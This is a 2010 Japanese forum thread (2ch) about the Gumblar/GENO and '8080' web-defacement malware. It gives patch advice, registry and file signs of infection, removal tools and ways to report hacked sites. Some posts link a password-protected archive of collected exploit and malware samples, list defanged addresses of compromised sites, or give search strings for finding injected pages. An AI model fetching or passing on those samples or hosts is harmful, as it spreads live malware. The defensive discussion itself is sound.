【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
at SEC
1:名無しさん@お腹いっぱい。
10/01/18 22:49:12 BE:455151124-PLT(19200)
改竄されたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
スレリンク(sec板)
【関連スレ】
GENOウイルススレ ★23
スレリンク(sec板)
2:名無しさん@お腹いっぱい。
10/01/18 22:51:00 BE:512044733-PLT(19200)
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
3:名無しさん@お腹いっぱい。
10/01/18 22:51:22 BE:796514227-PLT(19200)
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
URLリンク(jvndb.jvn.jp)
・Secunia Personal Software Inspector (PSI)
URLリンク(secunia.com)
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
URLリンク(www.forest.impress.co.jp)
URLリンク(hide9999.web.fc2.com)
4:名無しさん@お腹いっぱい。
10/01/18 22:52:09 BE:1365451283-PLT(19200)
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
URLリンク(blogs.technet.com)
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
URLリンク(itpro.nikkeibp.co.jp)
レジストリの修復 Windowsを使わずに修復してみる
URLリンク(pctrouble.lessismore.cc)
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
URLリンク(anubis.iseclab.org)
■ GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
5:名無しさん@お腹いっぱい。
10/01/18 22:52:37 BE:1536132593-PLT(19200)
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
URLリンク(www.so-net.ne.jp)
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
6:名無しさん@お腹いっぱい。
10/01/18 22:53:00 BE:2048177366-PLT(19200)
GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
7:名無しさん@お腹いっぱい。
10/01/18 22:53:28 BE:682725762-PLT(19200)
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
URLリンク(www.google.com)
8:名無しさん@お腹いっぱい。
10/01/18 22:55:41 BE:1194769973-PLT(19200)
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
9:名無しさん@お腹いっぱい。
10/01/18 22:58:17 BE:910300782-PLT(19200)
以上テンプレ
随時訂正(修正)お願いします
10:名無しさん@お腹いっぱい。
10/01/18 23:00:30
>>1〜>>9 お疲れです
11:名無しさん@お腹いっぱい。
10/01/18 23:06:26
>>5
>>8
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
12:名無しさん@お腹いっぱい。
10/01/18 23:12:06
【改ざんWebサイトの届出先】
■ JPCERT コーディネーションセンター (JPCERT/CC)
URLリンク(www.jpcert.or.jp)
・Web サイト改ざんに関する情報提供のお願い
URLリンク(www.jpcert.or.jp)
・インシデントの届出
URLリンク(form.jpcert.or.jp)
・記入例
URLリンク(www.jpcert.or.jp)
■ Google Safe Browsing: Report a Malware Page
URLリンク(www.google.com)
13:名無しさん@お腹いっぱい。
10/01/18 23:12:07
>>1乙です。
■専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=URLリンク(genochk.crz.jp)
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
14:名無しさん@お腹いっぱい。
10/01/18 23:18:11 BE:1572825-2BP(1236)
>>13
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
15:名無しさん@お腹いっぱい。
10/01/19 00:24:51
Gumblar
Exploit・本体まとめ 〜2010/01/18
URLリンク(labs-uploader.sabaitiba.com)
PASS:virus
16:名無しさん@お腹いっぱい。
10/01/19 02:01:35
Gumblar
Exploit・本体まとめ 〜2010/01/19
URLリンク(labs-uploader.sabaitiba.com)
PASS:virus
一件追加されました
17:名無しさん@お腹いっぱい。
10/01/19 07:13:30
URLリンク(kanpou.sub)<)
でもカスペルスキーはスルーしてたのか
18:名無しさん@お腹いっぱい。
10/01/19 11:34:58
これって新コードでしか?
URLリンク(www.bing.com)
検索ワード:"document.write(unescape(" "hp_d00(unescape("
↓アクセス注意↓
URLリンク(pastebin)<)●free4r●com/jb●htmlなどなど。
19:名無しさん@お腹いっぱい。
10/01/19 11:46:20
ここにURL貼り付ける人はhttpまで全部消してくれると助かる
専ブラによってはht抜いた程度じゃリンクしちゃうからTOPに自動で飛ばすページだとURLによっては踏む可能性がある
20:名無しさん@お腹いっぱい。
10/01/19 11:53:28
>>18の//よりあと(wwwから)が直リンされてるからhttp抜いても無駄じゃね?
素人じゃないんだから踏まなきゃいいんだよ
21:名無しさん@お腹いっぱい。
10/01/19 11:54:43
つーか●使えって書いてあんだろ
22:名無しさん@お腹いっぱい。
10/01/19 11:57:19
>>21
あんたが正しい
23:名無しさん@お腹いっぱい。
10/01/19 12:00:47
genius.jpn●org
ノートン先生に祭り上げられてるから見てみたら
Trojan-Downloader.JS.Agent.ewo反応
のソースチェッカーで見たら明らかに一番下に変なソースが入っているからGENOっぺぇお
24:名無しさん@お腹いっぱい。
10/01/19 12:16:39
>>13
headerを取得=URLリンク(fula.jp)
headerとソースとスクリーンショットを取得=URLリンク(fula.jp)
Dr.WEB=URLリンク(online.drweb.com)
Mcafee SiteAdvisorでリンク先をチェック=URLリンク(siteadvisor.pl)
Google セーフ ブラウジング診断ページ=URLリンク(www.google.com)
25:名無しさん@お腹いっぱい。
10/01/19 12:34:20
前スレに貼られてたこれアスクルだよね?だいぶやばくね?
URLリンク(www.askulnet)●com/
26:名無しさん@お腹いっぱい。
10/01/19 12:39:01
「いわゆるGENO系ウイルスに感染してみた」シリーズが面白かったw
27:名無しさん@お腹いっぱい。
10/01/19 12:51:36
>>25
アスクル本体とはちゃうけどね
28:名無しさん@お腹いっぱい。
10/01/19 12:54:09
>>25
アスクル、アスクルアリーナの代理店だそうだ
29:名無しさん@お腹いっぱい。
10/01/19 13:05:27
感染した
30:名無しさん@お腹いっぱい。
10/01/19 13:06:26
>>20
クリックする気が無いところでクリックしてしまったり、マウスポインタが意図せず動いたりしたことはない?
タッチパッド使ってるし、踏めないようになってると安心なんだけど
31:名無しさん@お腹いっぱい。
10/01/19 13:34:43
タッチパッドなら誤クリックもありそうだな
図面や絵を扱ってるとタッチパッドじゃ仕事にならないから使わないが
32:名無しさん@お腹いっぱい。
10/01/19 13:43:32
面倒でもマウスを繋ぎなさいってこった
33:名無しさん@お腹いっぱい。
10/01/19 13:44:45
専ブラでURL踏んだときはわんくっしょん噛むようになってるし
34:名無しさん@お腹いっぱい。
10/01/19 13:49:02
踏んでも感染先に飛ばないように●つかってるんじゃん
35:名無しさん@お腹いっぱい。
10/01/19 14:08:51
>>34
たまに直リンしちゃって騒いでる人がおるがなw
36:名無しさん@お腹いっぱい。
10/01/19 14:14:21
>>33
その設定Janeでできる?
37:名無しさん@お腹いっぱい。
10/01/19 14:27:24
>>16
乙です
38:名無しさん@お腹いっぱい。
10/01/19 14:31:06
>>36
ごめん俺少数派のゾヌ2なのよね
普通はワンクッション切ってる人のが多そうだしな
何で開くか選択する画面が出るんだわ
ゾヌか規定のブラウザか簡易ビューアか?みたいな
39:名無しさん@お腹いっぱい。
10/01/19 14:36:57
社団法人日本調査業協会
URLリンク(www.nittyokyo.or)<)
9/41
40:名無しさん@お腹いっぱい。
10/01/19 14:41:33
>>38
その機能いいなあ
41:名無しさん@お腹いっぱい。
10/01/19 14:41:59
立派なお名前なのに感染してるとガッカリ感がパネエ
42:名無しさん@お腹いっぱい。
10/01/19 14:43:22
>>36
おもいきってブラウザ指定のパスに存在しないファイル名を書いておくとかすると
開かないようになる・・・かな??
43:名無しさん@お腹いっぱい。
10/01/19 14:43:23
>>36
JaneViewなら
設定→機能→「画像で全拡張子をビューアで処理」にチェック
44:名無しさん@お腹いっぱい。
10/01/19 14:43:31
>>39
探偵屋の元締め?
裏情報いっぱいありそうで流出やばくね?
45:名無しさん@お腹いっぱい。
10/01/19 14:44:00
ゾヌは至れり尽くせりの多機能だが重いぞ〜w
46:名無しさん@お腹いっぱい。
10/01/19 14:44:45
あと、ブラウザのパスにlynxを指定するとか
47:名無しさん@お腹いっぱい。
10/01/19 14:48:06
>>42
それをテキストファイルに指定してる
踏むなとか書いた
48:名無しさん@お腹いっぱい。
10/01/19 14:49:52
URLリンク(blog.fc2.com)
FC2が注意喚起をした
>■ 危険防止について
>二次感染、三次感染を防ぐためにも、下記の点にご注意ください。
> * Windows Update を行う
> * Adobe Acrobat 及び Adobe Reader を最新にする
> * Adobe Flash Player を最新にする
> * Java Applet や ActiveX の設定を OFF にする
> * 見覚えのない怪しいリンクは開かない
> * ウィルス対策ソフトをインストールする
> * ウイルス定義ファイルを更新する
んん〜
49:名無しさん@お腹いっぱい。
10/01/19 14:51:48
>>47
ちょっとやってみる
いいかも
50:名無しさん@お腹いっぱい。
10/01/19 14:55:44
■Gumblar&Gumblar.x
現在冬眠中だが、ひっそり動いてるかもしれない
■8080系(巷ではGumblar亜種と呼ばれている)
/*GNU GPL*/:進化して/*LGPL*/になった。
/*CODE1*/:現在進化中につき要注意。
世界各地で毎日絶賛バージョンアップ中w
※/*CODE1*/(新型?)の検索は
検索ワード:"document.write(unescape(" "hp_d00(unescape("
注:GoogleよりBingのほうが絞り込める
■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
検索ワード:"<script>function" "return String.fromCharCode(c);" "getElementById("
※ちまちま増えてるから注意が必要
51:名無しさん@お腹いっぱい。
10/01/19 14:59:01
URLリンク(www.google.com)
52:名無しさん@お腹いっぱい。
10/01/19 15:25:15
アスクル代理店 株式会社丸吉 現状メンテナンス中
53:名無しさん@お腹いっぱい。
10/01/19 15:30:01
>>52
がんばれ〜 JSファイルにまだあるよー
54:名無しさん@お腹いっぱい。
10/01/19 15:51:22
+にスレ立ってるね
NHKのソースで
55:名無しさん@お腹いっぱい。
10/01/19 15:57:20
>>39
カスペだと、↓こんなん出ました
社団法人日本調査業協会
2010/01/19 15:51:40 検出しました: HEUR:Trojan-Downloader.Script.Generic URLリンク(www)●nittyokyo●or●jp/
56:名無しさん@お腹いっぱい。
10/01/19 16:03:51
>>46
テキストブラウザ良いな。
俺はもっとマイナーなHTML2にしている。
57:名無しさん@お腹いっぱい。
10/01/19 16:37:26
>>39
マカはトロイと反応しました。
58:名無しさん@お腹いっぱい。
10/01/19 16:38:57
AVGはノーガード戦法
59:名無しさん@お腹いっぱい。
10/01/19 16:58:42
おい
重複してんぞ
どうなってんだ
60:名無しさん@お腹いっぱい。
10/01/19 17:29:08
URLリンク(gamble)●xrea●jp/
URLで吹いたwww
61:名無しさん@お腹いっぱい。
10/01/19 17:32:04
Squid Proxy Server を経由してネットを使っています。推奨されるブロックの方法を
おでん授頂ければと思います。
62:名無しさん@お腹いっぱい。
10/01/19 17:34:35
>>61
だいこん、白滝、餅入り巾着
63:名無しさん@お腹いっぱい。
10/01/19 17:38:07
牛筋オヌヌメ
64:名無しさん@お腹いっぱい。
10/01/19 17:52:22
関東に住むまで竹輪麩を知らなかった
65:名無しさん@お腹いっぱい。
10/01/19 17:52:24
>61
玉子と大根とからしがあればご飯何杯でもいける!
66:名無しさん@お腹いっぱい。
10/01/19 17:54:56
おでんには味噌だ
67:名無しさん@お腹いっぱい。
10/01/19 17:56:53
===== 以下おでん雑談スレ =====
68:名無しさん@お腹いっぱい。
10/01/19 17:59:14
以上にしといたれよw
69:名無しさん@お腹いっぱい。
10/01/19 18:15:53
やっぱり サボテンだろ
70:名無しさん@お腹いっぱい。
10/01/19 18:17:46
===== 以上今日の晩ご飯雑談スレ ====
71:名無しさん@お腹いっぱい。
10/01/19 18:18:19
サボテンのサラダは意外にいける<これマジ
72:名無しさん@お腹いっぱい。
10/01/19 18:21:43
>>71
酸っぱくね?>サボテン
73:名無しさん@お腹いっぱい。
10/01/19 18:23:50
>>39
一日に300アクセスあるそうです
日本の探偵業の方々感染してるかも
74:名無しさん@お腹いっぱい。
10/01/19 18:25:56
>>73
300って少ないだろ・・・
75:名無しさん@お腹いっぱい。
10/01/19 18:27:14
すげー時代
76:名無しさん@お腹いっぱい。
10/01/19 18:50:30
今気づいたけど
ギャンブラー(ばくちうち)は、gamblerで
ガンブラーはgumblarだったんだな。
77:名無しさん@お腹いっぱい。
10/01/19 18:50:54
300だと個人サイトでも「ああそうですか」レベルだよなー
被害者も少なくていいわけだが
78:名無しさん@お腹いっぱい。
10/01/19 18:51:04
>>72
物によるな
アロエは苦いけど美味いよ
79:名無しさん@お腹いっぱい。
10/01/19 18:51:08
>>76 なんという豆w
80:名無しさん@お腹いっぱい。
10/01/19 18:54:50
>>78
アロエは蜂蜜に漬ければなんとか食えるな
身体によさげ
81:名無しさん@お腹いっぱい。
10/01/19 18:58:00
あまり関係ないが、Gumblar Checker2だけど
IE8で互換性表示offで見るとIEが動作停止するのは俺だけ?
82:名無しさん@お腹いっぱい。
10/01/19 19:00:25
>81
自分もだ。
何度も何度も何度も何度も何度も何度m
途切れて見られない。
でも、入力したサイトによるんだよね。何でかな。
83:名無しさん@お腹いっぱい。
10/01/19 19:01:42
Noscriptあれば負ける気しねえ
84:名無しさん@お腹いっぱい。
10/01/19 19:04:55
>>83
なぁ
85:名無しさん@お腹いっぱい。
10/01/19 19:08:07
Noscriptは作者の守銭奴っぷりがウザい。
86:名無しさん@お腹いっぱい。
10/01/19 19:11:06
ありゃ守銭奴とはいわんだろ
87:名無しさん@お腹いっぱい。
10/01/19 19:16:51
乞食だよな(失笑)
88:名無しさん@お腹いっぱい。
10/01/19 19:24:10
この前一年ぶりぐらいで入れてみたら相変わらず自サイトに誘導しやがったんで速攻消したわ。
謝罪はしても反省はしないような人間なんだろうな。
そんなにまでして広告収入が欲しいのかね?
89:名無しさん@お腹いっぱい。
10/01/19 19:27:45
>>88
設定で変えれるだろ
90:名無しさん@お腹いっぱい。
10/01/19 19:39:20 BE:804681784-PLT(12031)
>>81,82
申し訳ございません。
ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました
91:名無しさん@お腹いっぱい。
10/01/19 19:47:25
>90
うわ、作者様!さすが対応素早い、ありがとう!
こちらこそものすごくお世話になってます。
92:名無しさん@お腹いっぱい。
10/01/19 20:13:36
ロッテのトップページ、Gamblar Checker2で改ざんって出た
93:名無しさん@お腹いっぱい。
10/01/19 20:21:10
URLリンク(www.amuse.co.jp)
違うかな?
94:名無しさん@お腹いっぱい。
10/01/19 20:21:35
社団法人日本調査業協会
修正してあるけどお知らせ無しですか
95:名無しさん@お腹いっぱい。
10/01/19 20:22:27
>>92
出ないよ。
96:名無しさん@お腹いっぱい。
10/01/19 20:25:59
>>94
その立場にしてコンプライアンス無視
いいねえ〜w
97:名無しさん@お腹いっぱい。
10/01/19 20:31:42
>>94
人の事は調査するけども自分のことを調査されるのは嫌いですってか
98:名無しさん@お腹いっぱい。
10/01/19 20:32:54
>95
ごめん見方間違えた、「改ざんされた可能性があります」ってのはサイトの本文か。
ほんとに検出されたら「表示しない」って出るんだね。
ロッテさんみなさん、失礼。
99:名無しさん@お腹いっぱい。
10/01/19 20:47:40
白痴ランドが出てくるってがいしゅつ?
100:名無しさん@お腹いっぱい。
10/01/19 20:50:43
なにそれ
101:名無しさん@お腹いっぱい。
10/01/19 20:51:22
スレリンク(newsplus板:1番)
情報セキュリティのラック|LAC
URLリンク(www.lac.co.jp)
URLリンク(spysee.jp)
URLリンク(www.lac.co.jp)
専門家と称する方にお願い。事後に語るより
事前にウイルスの万延を防いで欲しいものです。。
102:名無しさん@お腹いっぱい。
10/01/19 21:09:51
>>16の書庫に入ってるMalwareってのが本体なのか?
103:名無しさん@お腹いっぱい。
10/01/19 21:09:51
そりゃ無理だ。現物が出てこねーと話にならん。
104:名無しさん@お腹いっぱい。
10/01/19 21:54:20
>>101
IE以外にしてjavascriptをきればいい
105:名無しさん@お腹いっぱい。
10/01/19 21:56:53
全然ダメだな
106:名無しさん@お腹いっぱい。
10/01/19 22:06:06
この手のGumblar系ウィルスって、どうして改竄したサイトから
撒布サイトに対してリダイレクトさせるんだろう?
改竄できるくらいなら、そのサイトに直接ウィルスを置けるのに。
あえてワンクッション入れるのには何か意味あるの?
107:名無しさん@お腹いっぱい。
10/01/19 22:08:21
>>104
なんでIEは駄目なの?
108:名無しさん@お腹いっぱい。
10/01/19 22:09:21
ウイルス本体を鯖に置くと鯖の対ウイルス装置に即検出される
109:名無しさん@お腹いっぱい。
10/01/19 22:10:09
規制されているから手短に。
h++p://anian.just-size●net/
Wepawetによると8080にやられてるっぽい。
AntiVir PersonalではJS/Agent.Bay.1で検出。
110:名無しさん@お腹いっぱい。
10/01/19 22:13:40
>>107
中国でIEが標的になってpwが盗まれたらしいよ。
111:名無しさん@お腹いっぱい。
10/01/19 22:20:54
6だけな
112:名無しさん@お腹いっぱい。
10/01/19 22:23:44
>>109
menu.js
/*LGPL*/
113:名無しさん@お腹いっぱい。
10/01/19 22:45:48
>>112
copy.jsも
114:名無しさん@お腹いっぱい。
10/01/19 22:54:14
攻撃されたのは6だけだが、同じ脆弱性は5以外6・7・8みんなもっているぜ
115:名無しさん@お腹いっぱい。
10/01/19 22:58:50
>>109
通販のメアドにめるしたお。
116:名無しさん@お腹いっぱい。
10/01/19 23:04:36
>>115
ありがとう。こっちはJPCERT/CCにインシデント報告しておきました。
JPCERTが具体的に何をするのかはわかりませんが。
117:名無しさん@お腹いっぱい。
10/01/19 23:46:39
改竄されるファイルは
index.html
index.htm
index.php
*.js
↑の他もある?
118:名無しさん@お腹いっぱい。
10/01/19 23:50:26
最強のウイルス対策
1 2階に上がる
2 パソコンを持つ
3 思いっきり投げ捨てる これでおk
119:名無しさん@お腹いっぱい。
10/01/19 23:52:14
鯖管には法律上の罰則が必要だな
120:名無しさん@お腹いっぱい。
10/01/19 23:54:02
>>119
誰も鯖缶しなくなるぞ。
121:名無しさん@お腹いっぱい。
10/01/19 23:59:00
exploit/本体まとめ 第七版
URLリンク(labs-uploader.sabaitiba.com)
鼬ごっこってレベルじゃねーぞ(AA略
122:名無しさん@お腹いっぱい。
10/01/20 00:04:06
もうボロボロじゃんか
なにやってんだ馬鹿ヤロー
123:名無しさん@お腹いっぱい。
10/01/20 00:09:18
>>110
レスd
124:名無しさん@お腹いっぱい。
10/01/20 00:12:04
>>121
virustotalにおくっといた
125:名無しさん@お腹いっぱい。
10/01/20 00:14:44
>>121
いつも乙です
ところで、どうやってそれだけの検体を?本体マルウェアとか
126:名無しさん@お腹いっぱい。
10/01/20 00:23:46
>>125
「地雷を‘実際に踏んで’回収」
127:名無しさん@お腹いっぱい。
10/01/20 00:23:54
>>123
IE6、IE7、IE8それぞれに脆弱性が存在する。
IE6は即アウトだがIE7、IE8はデータ実行防止DEPを有効にすれば一応凌げる。
IE7は詳細設定から「オンラインからの攻撃の緩和に役立てるため、メモリ保護を有効にする」 をクリック。
IE8はディフォでデータ実行防止DEPが有効。
128:名無しさん@お腹いっぱい。
10/01/20 00:31:14
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
| >>118
____.____ | .__ いらないPCを
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
129:名無しさん@お腹いっぱい。
10/01/20 00:36:57
>>128
,,-' _,,-''" "''- ,,_  ̄"''-,,__ ''--,,__
,,-''" ,, --''"ニ_―- _ ''-,,_ ゞ "-
て / ,,-",-''i|  ̄|i''-、 ヾ {
(" ./ i {;;;;;;;i| .|i;;;;;;) ,ノ ii
,, ( l, `'-i| |i;;-' ,,-'" _,,-"
"'-,, `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '" _,,--''"
 ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_ __,,-''"
._,,-'ニ-''ニ--''" ̄.i| ̄ |i-----,, ̄`"''-;;::''-`-,,
,,-''::::二-''" .--i| .|i "- ;;:::`、
._,-"::::/  ̄"''--- i| |i ヽ::::i
.(:::::{:(i(____ i| .|i _,,-':/:::}
`''-,_ヽ:::::''- ,,__,,,, _______i| .|i--__,,----..--'''":::::ノ,,-'
"--;;;;;;;;;;;;;;;;;""''--;;i| .|i二;;;;;::---;;;;;;;::--''"~
 ̄ ̄"..i| .|i
.i| |i
i| |i
.i| .|i
.i| |i
.i| ,,-、 、 |i
i| ノ::::i:::トiヽ、_.|i
_,, i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ
130:名無しさん@お腹いっぱい。
10/01/20 00:38:02
二番煎じイクナイ
131:名無しさん@お腹いっぱい。
10/01/20 01:23:53
URLリンク(www)●s-palcall●com/?download.php?file=602037
何となく鑑定スレ見てたらこんなのが依頼されてた
これからは短縮URLサービス使ったトラップも増えていくだろうし2chもおっかないのう
132:名無しさん@お腹いっぱい。
10/01/20 01:28:52
>>128
なんか違うような気がする
133:名無しさん@お腹いっぱい。
10/01/20 01:40:06
.__
|\_\
| |.◎.|
| |.: |
.\|.≡.|
 ̄ ̄
_,,_ ∩
(^Д^)/
⊂ ノ とったどー
(つ ノ
(ノ
134:名無しさん@お腹いっぱい。
10/01/20 02:51:45
i |i li| il|
. | 百 |; ガッ
;.:|___d._|;'
☆(;。∀゚)←>>***
/⊃ ⊃
135:名無しさん@お腹いっぱい。
10/01/20 03:59:30
最近、本当に洒落になってないな・・・
普通にweb巡回するだけでノートンの糞アドオンが真っ赤になる始末
今までだと掲示板系サイトの誤爆で済んでたがソース元を見るとjs絡みのtrojanと明らかにアレ臭い
動画サイトは思いっきりJS開いてるんだがflashの方のadobe側の対応は間に合っているのかな・・・
136:名無しさん@お腹いっぱい。
10/01/20 04:26:08
落ち着くまで専ブラで2ch見るだけにしといた方がいいな
・・・と思ったのが去年の四月でした
137:名無しさん@お腹いっぱい。
10/01/20 04:41:37
専ブラは専ブラで直リン馬鹿のせいで反応しまくってうざいし困ったもんだ
138:名無しさん@お腹いっぱい。
10/01/20 04:51:28
>>135
却ってエロサイトの方が管理をしっかりやってるのが多い気がする。
139:名無しさん@お腹いっぱい。
10/01/20 04:52:42
Avast!5.0発表
140:名無しさん@お腹いっぱい。
10/01/20 04:54:03
同人サイトの感染率の高さは異常
他板に専用対策スレがあるのも納得
141:名無しさん@お腹いっぱい。
10/01/20 06:03:07
>>121
E.exe.virusはavast!にメールした
URLリンク(www.virustotal.com)
142:名無しさん@お腹いっぱい。
10/01/20 08:20:23
>>127
MicrosoftがIEの臨時パッチを公開へ、脆弱性問題に対応
URLリンク(www.itmedia.co.jp)
